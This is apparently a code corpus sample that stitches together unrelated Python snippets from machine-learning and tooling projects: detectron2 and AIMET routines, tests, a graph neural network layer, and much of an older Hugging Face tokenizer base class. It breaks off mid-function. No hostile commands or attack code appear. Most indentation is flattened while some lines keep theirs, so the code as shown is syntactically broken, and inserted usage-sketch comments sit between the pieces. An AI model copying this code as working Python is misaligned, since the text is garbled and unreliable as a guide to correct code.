def test_create_options(db, settings):
Option.objects.all().delete()
xml_file = (((Path(settings.BASE_DIR) / 'xml') / 'elements') / 'options.xml')
root = read_xml_file(xml_file)
version = root.attrib.get('version')
elements = flat_xml_to_elements(root)
elements = convert_elements(elements, version)
elements = order_elements(elements)
elements = elements.values()
import_elements(elements)
assert (len(root) == len(elements) == Option.objects.count() == 9)
assert all(((element['created'] is True) for element in elements))
    assert all(((element['updated'] is False) for element in elements))
def test(base_model, psnet_model, decoder, regressor_delta, test_dataloader, args):
global use_gpu
global epoch_best_aqa, rho_best, L2_min, RL2_min
global epoch_best_tas, pred_tious_best_5, pred_tious_best_75
true_scores = []
pred_scores = []
pred_tious_test_5 = []
pred_tious_test_75 = []
base_model.eval()
psnet_model.eval()
decoder.eval()
regressor_delta.eval()
batch_num = len(test_dataloader)
with torch.no_grad():
datatime_start = time.time()
for (batch_idx, (data, target)) in enumerate(test_dataloader, 0):
datatime = (time.time() - datatime_start)
start = time.time()
video_1 = data['video'].float().cuda()
video_2_list = [item['video'].float().cuda() for item in target]
label_1_tas = (data['transits'].float().cuda() + 1)
label_2_tas_list = [(item['transits'].float().cuda() + 1) for item in target]
label_2_score_list = [item['final_score'].float().reshape((- 1), 1).cuda() for item in target]
helper.network_forward_test(base_model, psnet_model, decoder, regressor_delta, pred_scores, video_1, video_2_list, label_2_score_list, args, label_1_tas, label_2_tas_list, pred_tious_test_5, pred_tious_test_75)
batch_time = (time.time() - start)
if ((batch_idx % args.print_freq) == 0):
print(('[TEST][%d/%d] \t Batch_time %.2f \t Data_time %.2f' % (batch_idx, batch_num, batch_time, datatime)))
datatime_start = time.time()
true_scores.extend(data['final_score'].numpy())
pred_scores = np.array(pred_scores)
true_scores = np.array(true_scores)
(rho, p) = stats.spearmanr(pred_scores, true_scores)
L2 = (np.power((pred_scores - true_scores), 2).sum() / true_scores.shape[0])
RL2 = (np.power(((pred_scores - true_scores) / (true_scores.max() - true_scores.min())), 2).sum() / true_scores.shape[0])
pred_tious_test_mean_5 = (sum(pred_tious_test_5) / (len(test_dataloader) * args.bs_test))
pred_tious_test_mean_75 = (sum(pred_tious_test_75) / (len(test_dataloader) * args.bs_test))
print(('[TEST] tIoU_5: %.6f, tIoU_75: %.6f' % (pred_tious_test_mean_5, pred_tious_test_mean_75)))
    print(('[TEST] correlation: %.6f, L2: %.6f, RL2: %.6f' % (rho, L2, RL2)))
class Trainer(DefaultTrainer):
    @classmethod
    def build_evaluator(cls, cfg, dataset_name, output_folder=None):
if (output_folder is None):
output_folder = os.path.join(cfg.OUTPUT_DIR, 'inference')
os.makedirs(output_folder, exist_ok=True)
evaluator_list = []
evaluator_type = MetadataCatalog.get(dataset_name).evaluator_type
if (evaluator_type == 'coco'):
evaluator_list.append(COCOEvaluator(dataset_name, cfg, True, output_folder))
elif (evaluator_type == 'ytvis'):
evaluator_list.append(YTVISEvaluator(dataset_name, cfg, True, output_folder))
if (len(evaluator_list) == 0):
raise NotImplementedError('no Evaluator for the dataset {} with the type {}'.format(dataset_name, evaluator_type))
elif (len(evaluator_list) == 1):
return evaluator_list[0]
return DatasetEvaluators(evaluator_list)
    @classmethod
    def build_train_loader(cls, cfg):
dataset_name = cfg.DATASETS.TRAIN[0]
if dataset_name.startswith('coco'):
mapper = DetrDatasetMapper(cfg, is_train=True)
elif dataset_name.startswith('ytvis'):
mapper = YTVISDatasetMapper(cfg, is_train=True)
dataset_dict = get_detection_dataset_dicts(dataset_name, filter_empty=cfg.DATALOADER.FILTER_EMPTY_ANNOTATIONS, proposal_files=(cfg.DATASETS.PROPOSAL_FILES_TRAIN if cfg.MODEL.LOAD_PROPOSALS else None))
return build_detection_train_loader(cfg, mapper=mapper, dataset=dataset_dict)
    @classmethod
    def build_test_loader(cls, cfg, dataset_name):
dataset_name = cfg.DATASETS.TEST[0]
if dataset_name.startswith('coco'):
mapper = DetrDatasetMapper(cfg, is_train=False)
elif dataset_name.startswith('ytvis'):
mapper = YTVISDatasetMapper(cfg, is_train=False)
return build_detection_test_loader(cfg, dataset_name, mapper=mapper)
    @classmethod
    def build_optimizer(cls, cfg, model):
params: List[Dict[(str, Any)]] = []
memo: Set[torch.nn.parameter.Parameter] = set()
for (key, value) in model.named_parameters(recurse=True):
if (not value.requires_grad):
continue
if (value in memo):
continue
memo.add(value)
lr = cfg.SOLVER.BASE_LR
weight_decay = cfg.SOLVER.WEIGHT_DECAY
if ('backbone' in key):
lr = (lr * cfg.SOLVER.BACKBONE_MULTIPLIER)
params += [{'params': [value], 'lr': lr, 'weight_decay': weight_decay}]
def maybe_add_full_model_gradient_clipping(optim):
clip_norm_val = cfg.SOLVER.CLIP_GRADIENTS.CLIP_VALUE
enable = (cfg.SOLVER.CLIP_GRADIENTS.ENABLED and (cfg.SOLVER.CLIP_GRADIENTS.CLIP_TYPE == 'full_model') and (clip_norm_val > 0.0))
class FullModelGradientClippingOptimizer(optim):
def step(self, closure=None):
all_params = itertools.chain(*[x['params'] for x in self.param_groups])
torch.nn.utils.clip_grad_norm_(all_params, clip_norm_val)
super().step(closure=closure)
return (FullModelGradientClippingOptimizer if enable else optim)
optimizer_type = cfg.SOLVER.OPTIMIZER
if (optimizer_type == 'SGD'):
optimizer = maybe_add_full_model_gradient_clipping(torch.optim.SGD)(params, cfg.SOLVER.BASE_LR, momentum=cfg.SOLVER.MOMENTUM)
elif (optimizer_type == 'ADAMW'):
optimizer = maybe_add_full_model_gradient_clipping(torch.optim.AdamW)(params, cfg.SOLVER.BASE_LR)
else:
raise NotImplementedError(f'no optimizer type {optimizer_type}')
if (not (cfg.SOLVER.CLIP_GRADIENTS.CLIP_TYPE == 'full_model')):
optimizer = maybe_add_gradient_clipping(cfg, optimizer)
        return optimizer
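# Hedged usage sketch: the standard detectron2 DefaultTrainer entry points this
# Trainer inherits; the setup() helper producing cfg is assumed, not shown above.
def run_training_sketch(cfg):
    trainer = Trainer(cfg)
    trainer.resume_or_load(resume=False)
    return trainer.train()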
class PetConfig(ABC):
def __repr__(self):
return repr(self.__dict__)
def save(self, path: str):
with open(path, 'w', encoding='utf8') as fh:
json.dump(self.__dict__, fh)
    @classmethod
    def load(cls, path: str):
cfg = cls.__new__(cls)
with open(path, 'r', encoding='utf8') as fh:
cfg.__dict__ = json.load(fh)
        return cfg
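# Hedged round-trip sketch for a hypothetical PetConfig subclass (the concrete
# config classes live elsewhere in the project):
# cfg = SomePetConfig(...); cfg.save('cfg.json')
# restored = SomePetConfig.load('cfg.json')
# assert repr(restored) == repr(cfg)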
def test_get_style_defs_contains_default_line_numbers_styles():
style_defs = HtmlFormatter().get_style_defs().splitlines()
assert (style_defs[1] == 'td.linenos .normal { color: inherit; background-color: transparent; padding-left: 5px; padding-right: 5px; }')
    assert (style_defs[2] == 'span.linenos { color: inherit; background-color: transparent; padding-left: 5px; padding-right: 5px; }')
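# Context note: Pygments' HtmlFormatter.get_style_defs() emits CSS rules for the
# formatter's token classes and accepts an optional selector prefix, e.g.
# HtmlFormatter().get_style_defs('.highlight').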
def _resolve_ship(fitting, sMkt, b_localized):
shipType = fitting.getElementsByTagName('shipType').item(0).getAttribute('value')
anything = None
if b_localized:
try:
(shipType, anything) = _extract_match(shipType)
except ExtractingError:
pass
limit = 2
ship = None
while True:
must_retry = False
try:
try:
ship = Ship(sMkt.getItem(shipType))
except ValueError:
ship = Citadel(sMkt.getItem(shipType))
except (KeyboardInterrupt, SystemExit):
raise
except Exception as e:
pyfalog.warning('Caught exception on _resolve_ship')
pyfalog.error(e)
limit -= 1
if (limit == 0):
break
shipType = anything
must_retry = True
if (not must_retry):
break
if (ship is None):
raise Exception('cannot resolve ship type.')
fitobj = Fit(ship=ship)
anything = fitting.getAttribute('name')
if (('<' in anything) or ('>' in anything)):
anything = replace_ltgt(anything)
fitobj.name = anything
    return fitobj
class Graphsn_GIN(nn.Module):
def __init__(self, nfeat, nhid, nclass, dropout):
super(Graphsn_GIN, self).__init__()
self.nn = Linear(nfeat, nhid)
self.fc = Linear(nhid, nclass)
self.dropout = dropout
self.eps = nn.Parameter(torch.FloatTensor(1))
self.reset_parameters()
def reset_parameters(self):
stdv_eps = (0.6 / math.sqrt(self.eps.size(0)))
nn.init.constant_(self.eps, stdv_eps)
def forward(self, x, adj):
v = (self.eps * torch.diag(adj))
mask = torch.diag(torch.ones_like(v))
adj = ((mask * torch.diag(v)) + ((1.0 - mask) * adj))
x = torch.mm(adj, x)
x = F.relu(self.nn(x))
x = F.dropout(x, self.dropout, training=self.training)
x = self.fc(x)
        return F.log_softmax(x, dim=(- 1))
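# Hedged usage sketch for Graphsn_GIN; node count, feature width, and the dense
# adjacency layout are assumptions (the training script is not shown), and the
# torch imports used by the class above are assumed to be in scope.
def gin_forward_sketch():
    model = Graphsn_GIN(nfeat=16, nhid=32, nclass=4, dropout=0.5)
    x = torch.randn(10, 16)           # 10 nodes, 16 features each
    adj = torch.rand(10, 10)
    adj = (adj + adj.t()) / 2         # symmetric dense adjacency
    return model(x, adj)              # (10, 4) log-probabilities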
def train_sample_places_low_shot(low_shot_trainer: SVMLowShotTrainer, k_values: List[int], sample_inds: List[int], sample_num: int, output_dir: str, layername: str, cfg: AttrDict):
set_env_vars(local_rank=0, node_id=0, cfg=cfg)
for low_shot_kvalue in k_values:
checkpoint_dir = f'{output_dir}/sample{sample_num}_k{low_shot_kvalue}'
train_data = merge_features(checkpoint_dir, 'train', layername, cfg)
train_features = train_data['features']
train_targets = train_data['targets']
checkpoint_dir = f'{output_dir}/sample{sample_inds[0]}_k{k_values[0]}'
test_data = merge_features(checkpoint_dir, 'test', layername, cfg)
test_features = test_data['features']
test_targets = test_data['targets']
low_shot_trainer.train(train_features, train_targets, sample_num, low_shot_kvalue)
        low_shot_trainer.test(test_features, test_targets, sample_num, low_shot_kvalue)
def test_verify_args(parser: CompatibleArgumentParser, capsys: CaptureFixture) -> None:
with pytest.raises(SystemExit) as ex:
parser.parse_args(['--no-license-path'])
capture = capsys.readouterr().err
for arg in ('--no-license-path', '--with-license-file'):
assert (arg in capture)
with pytest.raises(SystemExit) as ex:
parser.parse_args(['--with-notice-file'])
capture = capsys.readouterr().err
for arg in ('--with-notice-file', '--with-license-file'):
assert (arg in capture)
with pytest.raises(SystemExit) as ex:
parser.parse_args(['--filter-code-page=utf8'])
capture = capsys.readouterr().err
for arg in ('--filter-code-page', '--filter-strings'):
assert (arg in capture)
with pytest.raises(SystemExit) as ex:
parser.parse_args(['--filter-strings', '--filter-code-page=XX'])
capture = capsys.readouterr().err
for arg in ('invalid code', '--filter-code-page'):
        assert (arg in capture)
class MultiRcTaskHelper(TaskHelper):
def add_special_input_features(self, input_example: InputExample, input_features: InputFeatures) -> None:
input_features.meta['question_idx'] = input_example.meta['question_idx']
def add_features_to_dict(self, features: List[InputFeatures], feature_dict: Dict[(str, torch.Tensor)]) -> None:
        feature_dict['question_idx'] = torch.tensor([f.meta['question_idx'] for f in features], dtype=torch.long)
def pass_calibration_data(sim_model, forward_pass_args=None):
data_loader = ImageNetDataPipeline.get_val_dataloader()
batch_size = 64
max_batch_counter = 16
sim_model.eval()
current_batch_counter = 0
with torch.no_grad():
for (input_data, target_data) in data_loader:
inputs_batch = input_data
sim_model(inputs_batch)
current_batch_counter += 1
if (current_batch_counter == max_batch_counter):
                break
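# Hedged sketch of where this callback plugs in: AIMET's QuantizationSimModel
# takes a forward-pass callback when computing quantization encodings; the `sim`
# object is assumed to be constructed elsewhere in the script.
# sim.compute_encodings(forward_pass_callback=pass_calibration_data,
#                       forward_pass_callback_args=None)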
class PreTrainedTokenizer(object):
vocab_files_names = {}
pretrained_vocab_files_map = {}
pretrained_init_configuration = {}
max_model_input_sizes = {}
SPECIAL_TOKENS_ATTRIBUTES = ['bos_token', 'eos_token', 'unk_token', 'sep_token', 'pad_token', 'cls_token', 'mask_token', 'additional_special_tokens']
padding_side = 'right'
    @property
    def bos_token(self):
        if (self._bos_token is None):
            logger.error('Using bos_token, but it is not set yet.')
        return self._bos_token
    @property
    def eos_token(self):
        if (self._eos_token is None):
            logger.error('Using eos_token, but it is not set yet.')
        return self._eos_token
    @property
    def unk_token(self):
        if (self._unk_token is None):
            logger.error('Using unk_token, but it is not set yet.')
        return self._unk_token
    @property
    def sep_token(self):
        if (self._sep_token is None):
            logger.error('Using sep_token, but it is not set yet.')
        return self._sep_token
    @property
    def pad_token(self):
        if (self._pad_token is None):
            logger.error('Using pad_token, but it is not set yet.')
        return self._pad_token
    @property
    def cls_token(self):
        if (self._cls_token is None):
            logger.error('Using cls_token, but it is not set yet.')
        return self._cls_token
    @property
    def mask_token(self):
        if (self._mask_token is None):
            logger.error('Using mask_token, but it is not set yet.')
        return self._mask_token
    @property
    def additional_special_tokens(self):
        if (self._additional_special_tokens is None):
            logger.error('Using additional_special_tokens, but it is not set yet.')
        return self._additional_special_tokens
    @bos_token.setter
    def bos_token(self, value):
        self._bos_token = value
    @eos_token.setter
    def eos_token(self, value):
        self._eos_token = value
    @unk_token.setter
    def unk_token(self, value):
        self._unk_token = value
    @sep_token.setter
    def sep_token(self, value):
        self._sep_token = value
    @pad_token.setter
    def pad_token(self, value):
        self._pad_token = value
    @cls_token.setter
    def cls_token(self, value):
        self._cls_token = value
    @mask_token.setter
    def mask_token(self, value):
        self._mask_token = value
    @additional_special_tokens.setter
    def additional_special_tokens(self, value):
        self._additional_special_tokens = value
    @property
    def bos_token_id(self):
        return self.convert_tokens_to_ids(self.bos_token)
    @property
    def eos_token_id(self):
        return self.convert_tokens_to_ids(self.eos_token)
    @property
    def unk_token_id(self):
        return self.convert_tokens_to_ids(self.unk_token)
    @property
    def sep_token_id(self):
        return self.convert_tokens_to_ids(self.sep_token)
    @property
    def pad_token_id(self):
        return self.convert_tokens_to_ids(self.pad_token)
    @property
    def pad_token_type_id(self):
        return self._pad_token_type_id
    @property
    def cls_token_id(self):
        return self.convert_tokens_to_ids(self.cls_token)
    @property
    def mask_token_id(self):
        return self.convert_tokens_to_ids(self.mask_token)
    @property
    def additional_special_tokens_ids(self):
        return self.convert_tokens_to_ids(self.additional_special_tokens)
def __init__(self, max_len=None, **kwargs):
self._bos_token = None
self._eos_token = None
self._unk_token = None
self._sep_token = None
self._pad_token = None
self._cls_token = None
self._mask_token = None
self._pad_token_type_id = 0
self._additional_special_tokens = []
        self.max_len = (max_len if (max_len is not None) else int(1e12))
self.padding_side = kwargs.pop('padding_side', self.padding_side)
self.added_tokens_encoder = {}
self.unique_added_tokens_encoder = set()
self.added_tokens_decoder = {}
self.init_inputs = ()
self.init_kwargs = {}
for (key, value) in kwargs.items():
if (key in self.SPECIAL_TOKENS_ATTRIBUTES):
if (key == 'additional_special_tokens'):
assert (isinstance(value, (list, tuple)) and all((isinstance(t, str) for t in value)))
else:
assert isinstance(value, str)
setattr(self, key, value)
    @classmethod
    def from_pretrained(cls, *inputs, **kwargs):
return cls._from_pretrained(*inputs, **kwargs)
    @classmethod
    def _from_pretrained(cls, pretrained_model_name_or_path, *init_inputs, **kwargs):
cache_dir = kwargs.pop('cache_dir', None)
force_download = kwargs.pop('force_download', False)
resume_download = kwargs.pop('resume_download', False)
proxies = kwargs.pop('proxies', None)
s3_models = list(cls.max_model_input_sizes.keys())
vocab_files = {}
init_configuration = {}
if (pretrained_model_name_or_path in s3_models):
for (file_id, map_list) in cls.pretrained_vocab_files_map.items():
vocab_files[file_id] = map_list[pretrained_model_name_or_path]
if (cls.pretrained_init_configuration and (pretrained_model_name_or_path in cls.pretrained_init_configuration)):
init_configuration = cls.pretrained_init_configuration[pretrained_model_name_or_path]
else:
logger.info("Model name '{}' not found in model shortcut name list ({}). Assuming '{}' is a path or url to a directory containing tokenizer files.".format(pretrained_model_name_or_path, ', '.join(s3_models), pretrained_model_name_or_path))
for (file_id, file_name) in cls.vocab_files_names.items():
if os.path.isdir(pretrained_model_name_or_path):
full_file_name = os.path.join(pretrained_model_name_or_path, file_name)
if (not os.path.exists(full_file_name)):
logger.info("Didn't find file {}. We won't load it.".format(full_file_name))
full_file_name = None
elif (os.path.isfile(pretrained_model_name_or_path) or is_remote_url(pretrained_model_name_or_path)):
full_file_name = pretrained_model_name_or_path
else:
full_file_name = hf_bucket_url(pretrained_model_name_or_path, postfix=file_name)
vocab_files[file_id] = full_file_name
additional_files_names = {'added_tokens_file': ADDED_TOKENS_FILE, 'special_tokens_map_file': SPECIAL_TOKENS_MAP_FILE, 'tokenizer_config_file': TOKENIZER_CONFIG_FILE}
saved_directory = pretrained_model_name_or_path
if (os.path.exists(saved_directory) and (not os.path.isdir(saved_directory))):
saved_directory = os.path.dirname(saved_directory)
for (file_id, file_name) in additional_files_names.items():
full_file_name = os.path.join(saved_directory, file_name)
if (not os.path.exists(full_file_name)):
logger.info("Didn't find file {}. We won't load it.".format(full_file_name))
full_file_name = None
vocab_files[file_id] = full_file_name
if all(((full_file_name is None) for full_file_name in vocab_files.values())):
raise EnvironmentError("Model name '{}' was not found in tokenizers model name list ({}). We assumed '{}' was a path or url to a directory containing vocabulary files named {} but couldn't find such vocabulary files at this path or url.".format(pretrained_model_name_or_path, ', '.join(s3_models), pretrained_model_name_or_path, list(cls.vocab_files_names.values())))
try:
resolved_vocab_files = {}
for (file_id, file_path) in vocab_files.items():
if (file_path is None):
resolved_vocab_files[file_id] = None
else:
resolved_vocab_files[file_id] = cached_path(file_path, cache_dir=cache_dir, force_download=force_download, proxies=proxies, resume_download=resume_download)
except EnvironmentError:
if (pretrained_model_name_or_path in s3_models):
msg = "Couldn't reach server at '{}' to download vocabulary files."
else:
msg = "Model name '{}' was not found in tokenizers model name list ({}). We assumed '{}' was a path or url to a directory containing vocabulary files named {}, but couldn't find such vocabulary files at this path or url.".format(pretrained_model_name_or_path, ', '.join(s3_models), pretrained_model_name_or_path, list(cls.vocab_files_names.values()))
raise EnvironmentError(msg)
for (file_id, file_path) in vocab_files.items():
if (file_path == resolved_vocab_files[file_id]):
logger.info('loading file {}'.format(file_path))
else:
logger.info('loading file {} from cache at {}'.format(file_path, resolved_vocab_files[file_id]))
tokenizer_config_file = resolved_vocab_files.pop('tokenizer_config_file', None)
if (tokenizer_config_file is not None):
with open(tokenizer_config_file, encoding='utf-8') as tokenizer_config_handle:
init_kwargs = json.load(tokenizer_config_handle)
saved_init_inputs = init_kwargs.pop('init_inputs', ())
if (not init_inputs):
init_inputs = saved_init_inputs
else:
init_kwargs = init_configuration
init_kwargs.update(kwargs)
if (pretrained_model_name_or_path in cls.max_model_input_sizes):
max_len = cls.max_model_input_sizes[pretrained_model_name_or_path]
if ((max_len is not None) and isinstance(max_len, (int, float))):
                init_kwargs['max_len'] = min(init_kwargs.get('max_len', int(1e12)), max_len)
added_tokens_file = resolved_vocab_files.pop('added_tokens_file', None)
special_tokens_map_file = resolved_vocab_files.pop('special_tokens_map_file', None)
for (args_name, file_path) in resolved_vocab_files.items():
if (args_name not in init_kwargs):
init_kwargs[args_name] = file_path
if (special_tokens_map_file is not None):
with open(special_tokens_map_file, encoding='utf-8') as special_tokens_map_handle:
special_tokens_map = json.load(special_tokens_map_handle)
for (key, value) in special_tokens_map.items():
if (key not in init_kwargs):
init_kwargs[key] = value
try:
tokenizer = cls(*init_inputs, **init_kwargs)
except OSError:
            raise OSError('Unable to load vocabulary from file. Please check that the provided vocabulary is accessible and not corrupted.')
tokenizer.init_inputs = init_inputs
tokenizer.init_kwargs = init_kwargs
if (added_tokens_file is not None):
with open(added_tokens_file, encoding='utf-8') as added_tokens_handle:
added_tok_encoder = json.load(added_tokens_handle)
added_tok_decoder = {v: k for (k, v) in added_tok_encoder.items()}
tokenizer.added_tokens_encoder.update(added_tok_encoder)
tokenizer.added_tokens_decoder.update(added_tok_decoder)
return tokenizer
def save_pretrained(self, save_directory):
if (not os.path.isdir(save_directory)):
logger.error('Saving directory ({}) should be a directory'.format(save_directory))
return
special_tokens_map_file = os.path.join(save_directory, SPECIAL_TOKENS_MAP_FILE)
added_tokens_file = os.path.join(save_directory, ADDED_TOKENS_FILE)
tokenizer_config_file = os.path.join(save_directory, TOKENIZER_CONFIG_FILE)
tokenizer_config = copy.deepcopy(self.init_kwargs)
tokenizer_config['init_inputs'] = copy.deepcopy(self.init_inputs)
for file_id in self.vocab_files_names.keys():
tokenizer_config.pop(file_id, None)
with open(tokenizer_config_file, 'w', encoding='utf-8') as f:
f.write(json.dumps(tokenizer_config, ensure_ascii=False))
with open(special_tokens_map_file, 'w', encoding='utf-8') as f:
f.write(json.dumps(self.special_tokens_map, ensure_ascii=False))
with open(added_tokens_file, 'w', encoding='utf-8') as f:
if self.added_tokens_encoder:
out_str = json.dumps(self.added_tokens_encoder, ensure_ascii=False)
else:
out_str = '{}'
f.write(out_str)
vocab_files = self.save_vocabulary(save_directory)
return (vocab_files + (special_tokens_map_file, added_tokens_file))
def save_vocabulary(self, save_directory):
raise NotImplementedError
    @property
    def vocab_size(self):
raise NotImplementedError
def __len__(self):
return (self.vocab_size + len(self.added_tokens_encoder))
def add_tokens(self, new_tokens):
if (not new_tokens):
return 0
to_add_tokens = []
for token in new_tokens:
assert isinstance(token, str)
if (self.init_kwargs.get('do_lower_case', False) and (token not in self.all_special_tokens)):
token = token.lower()
if ((token != self.unk_token) and (self.convert_tokens_to_ids(token) == self.convert_tokens_to_ids(self.unk_token)) and (token not in to_add_tokens)):
to_add_tokens.append(token)
logger.info('Adding %s to the vocabulary', token)
added_tok_encoder = dict(((tok, (len(self) + i)) for (i, tok) in enumerate(to_add_tokens)))
added_tok_decoder = {v: k for (k, v) in added_tok_encoder.items()}
self.added_tokens_encoder.update(added_tok_encoder)
self.unique_added_tokens_encoder = set(self.added_tokens_encoder.keys()).union(set(self.all_special_tokens))
self.added_tokens_decoder.update(added_tok_decoder)
return len(to_add_tokens)
def num_added_tokens(self, pair=False):
token_ids_0 = []
token_ids_1 = []
return len(self.build_inputs_with_special_tokens(token_ids_0, (token_ids_1 if pair else None)))
def add_special_tokens(self, special_tokens_dict):
if (not special_tokens_dict):
return 0
added_tokens = 0
for (key, value) in special_tokens_dict.items():
assert (key in self.SPECIAL_TOKENS_ATTRIBUTES)
if (key == 'additional_special_tokens'):
assert (isinstance(value, (list, tuple)) and all((isinstance(t, str) for t in value)))
added_tokens += self.add_tokens(value)
else:
assert isinstance(value, str)
added_tokens += self.add_tokens([value])
logger.info('Assigning %s to the %s key of the tokenizer', value, key)
setattr(self, key, value)
return added_tokens
def tokenize(self, text, **kwargs):
all_special_tokens = self.all_special_tokens
def lowercase_text(t):
escaped_special_toks = [re.escape(s_tok) for s_tok in all_special_tokens]
pattern = ((('(' + '|'.join(escaped_special_toks)) + ')|') + '(.+?)')
return re.sub(pattern, (lambda m: (m.groups()[0] or m.groups()[1].lower())), t)
if self.init_kwargs.get('do_lower_case', False):
text = lowercase_text(text)
def split_on_token(tok, text):
result = []
split_text = text.split(tok)
for (i, sub_text) in enumerate(split_text):
sub_text = sub_text.strip()
if ((i == 0) and (not sub_text)):
result += [tok]
elif (i == (len(split_text) - 1)):
if sub_text:
result += [sub_text]
else:
pass
else:
if sub_text:
result += [sub_text]
result += [tok]
return result
def split_on_tokens(tok_list, text):
if (not text.strip()):
return []
if (not tok_list):
return self._tokenize(text, **kwargs)
tokenized_text = []
text_list = [text]
for tok in tok_list:
tokenized_text = []
for sub_text in text_list:
if (sub_text not in self.unique_added_tokens_encoder):
tokenized_text += split_on_token(tok, sub_text)
else:
tokenized_text += [sub_text]
text_list = tokenized_text
return list(itertools.chain.from_iterable(((self._tokenize(token, **kwargs) if (token not in self.unique_added_tokens_encoder) else [token]) for token in tokenized_text)))
added_tokens = self.unique_added_tokens_encoder
tokenized_text = split_on_tokens(added_tokens, text)
return tokenized_text
def _tokenize(self, text, **kwargs):
raise NotImplementedError
def convert_tokens_to_ids(self, tokens):
if (tokens is None):
return None
if isinstance(tokens, str):
return self._convert_token_to_id_with_added_voc(tokens)
ids = []
for token in tokens:
ids.append(self._convert_token_to_id_with_added_voc(token))
return ids
def _convert_token_to_id_with_added_voc(self, token):
if (token is None):
return None
if (token in self.added_tokens_encoder):
return self.added_tokens_encoder[token]
return self._convert_token_to_id(token)
def _convert_token_to_id(self, token):
raise NotImplementedError
def encode(self, text, text_pair=None, add_special_tokens=True, max_length=None, stride=0, truncation_strategy='longest_first', pad_to_max_length=False, return_tensors=None, **kwargs):
encoded_inputs = self.encode_plus(text, text_pair=text_pair, max_length=max_length, add_special_tokens=add_special_tokens, stride=stride, truncation_strategy=truncation_strategy, pad_to_max_length=pad_to_max_length, return_tensors=return_tensors, **kwargs)
return encoded_inputs['input_ids']
def encode_plus(self, text, text_pair=None, add_special_tokens=True, max_length=None, stride=0, truncation_strategy='longest_first', pad_to_max_length=False, return_tensors=None, return_token_type_ids=True, return_attention_mask=True, return_overflowing_tokens=False, return_special_tokens_mask=False, **kwargs):
def get_input_ids(text):
if isinstance(text, str):
return self.convert_tokens_to_ids(self.tokenize(text, **kwargs))
elif (isinstance(text, (list, tuple)) and (len(text) > 0) and isinstance(text[0], str)):
return self.convert_tokens_to_ids(text)
elif (isinstance(text, (list, tuple)) and (len(text) > 0) and isinstance(text[0], int)):
return text
else:
raise ValueError('Input is not valid. Should be a string, a list/tuple of strings or a list/tuple of integers.')
first_ids = get_input_ids(text)
second_ids = (get_input_ids(text_pair) if (text_pair is not None) else None)
return self.prepare_for_model(first_ids, pair_ids=second_ids, max_length=max_length, pad_to_max_length=pad_to_max_length, add_special_tokens=add_special_tokens, stride=stride, truncation_strategy=truncation_strategy, return_tensors=return_tensors, return_attention_mask=return_attention_mask, return_token_type_ids=return_token_type_ids, return_overflowing_tokens=return_overflowing_tokens, return_special_tokens_mask=return_special_tokens_mask)
def batch_encode_plus(self, batch_text_or_text_pairs=None, add_special_tokens=False, max_length=None, stride=0, truncation_strategy='longest_first', return_tensors=None, return_input_lengths=False, return_attention_masks=False, **kwargs):
batch_outputs = {}
for ids_or_pair_ids in batch_text_or_text_pairs:
if isinstance(ids_or_pair_ids, (list, tuple)):
assert (len(ids_or_pair_ids) == 2)
(ids, pair_ids) = ids_or_pair_ids
else:
(ids, pair_ids) = (ids_or_pair_ids, None)
outputs = self.encode_plus(ids, pair_ids, add_special_tokens=add_special_tokens, max_length=max_length, stride=stride, truncation_strategy=truncation_strategy, return_tensors=None)
if return_input_lengths:
outputs['input_len'] = len(outputs['input_ids'])
for (key, value) in outputs.items():
if (key not in batch_outputs):
batch_outputs[key] = []
batch_outputs[key].append(value)
max_seq_len = max(map(len, batch_outputs['input_ids']))
if return_attention_masks:
batch_outputs['attention_mask'] = [([0] * len(v)) for v in batch_outputs['input_ids']]
if (return_tensors is not None):
for (key, value) in batch_outputs.items():
padded_value = value
if (key != 'input_len'):
padded_value = [(v + ([(self.pad_token_id if (key == 'input_ids') else 1)] * (max_seq_len - len(v)))) for v in padded_value]
if ((return_tensors == 'tf') and is_tf_available()):
batch_outputs[key] = tf.constant(padded_value)
elif ((return_tensors == 'pt') and is_torch_available()):
batch_outputs[key] = torch.tensor(padded_value)
elif (return_tensors is not None):
logger.warning('Unable to convert output to tensors format {}, PyTorch or TensorFlow is not available.'.format(return_tensors))
if return_attention_masks:
if is_tf_available():
batch_outputs['attention_mask'] = tf.abs((batch_outputs['attention_mask'] - 1))
else:
batch_outputs['attention_mask'] = torch.abs((batch_outputs['attention_mask'] - 1))
return batch_outputs
def prepare_for_model(self, ids, pair_ids=None, max_length=None, add_special_tokens=True, stride=0, truncation_strategy='longest_first', pad_to_max_length=False, return_tensors=None, return_token_type_ids=True, return_attention_mask=True, return_overflowing_tokens=False, return_special_tokens_mask=False):
pair = bool((pair_ids is not None))
len_ids = len(ids)
len_pair_ids = (len(pair_ids) if pair else 0)
encoded_inputs = {}
total_len = ((len_ids + len_pair_ids) + (self.num_added_tokens(pair=pair) if add_special_tokens else 0))
if (max_length and (total_len > max_length)):
(ids, pair_ids, overflowing_tokens) = self.truncate_sequences(ids, pair_ids=pair_ids, num_tokens_to_remove=(total_len - max_length), truncation_strategy=truncation_strategy, stride=stride)
if return_overflowing_tokens:
encoded_inputs['overflowing_tokens'] = overflowing_tokens
encoded_inputs['num_truncated_tokens'] = (total_len - max_length)
if add_special_tokens:
sequence = self.build_inputs_with_special_tokens(ids, pair_ids)
token_type_ids = self.create_token_type_ids_from_sequences(ids, pair_ids)
else:
sequence = ((ids + pair_ids) if pair else ids)
token_type_ids = (([0] * len(ids)) + (([1] * len(pair_ids)) if pair else []))
if return_special_tokens_mask:
encoded_inputs['special_tokens_mask'] = self.get_special_tokens_mask(ids, pair_ids)
encoded_inputs['input_ids'] = sequence
if return_token_type_ids:
encoded_inputs['token_type_ids'] = token_type_ids
if (max_length and (len(encoded_inputs['input_ids']) > max_length)):
encoded_inputs['input_ids'] = encoded_inputs['input_ids'][:max_length]
if return_token_type_ids:
encoded_inputs['token_type_ids'] = encoded_inputs['token_type_ids'][:max_length]
if return_special_tokens_mask:
encoded_inputs['special_tokens_mask'] = encoded_inputs['special_tokens_mask'][:max_length]
if ((max_length is None) and (len(encoded_inputs['input_ids']) > self.max_len)):
logger.warning('Token indices sequence length is longer than the specified maximum sequence length for this model ({} > {}). Running this sequence through the model will result in indexing errors'.format(len(ids), self.max_len))
needs_to_be_padded = (pad_to_max_length and ((max_length and (len(encoded_inputs['input_ids']) < max_length)) or ((max_length is None) and (len(encoded_inputs['input_ids']) < self.max_len) and (self.max_len <= 10000))))
if (pad_to_max_length and (max_length is None) and (self.max_len > 10000)):
logger.warning("Sequence can't be padded as no maximum length is specified and the model maximum length is too high.")
if needs_to_be_padded:
difference = ((max_length if (max_length is not None) else self.max_len) - len(encoded_inputs['input_ids']))
if (self.padding_side == 'right'):
if return_attention_mask:
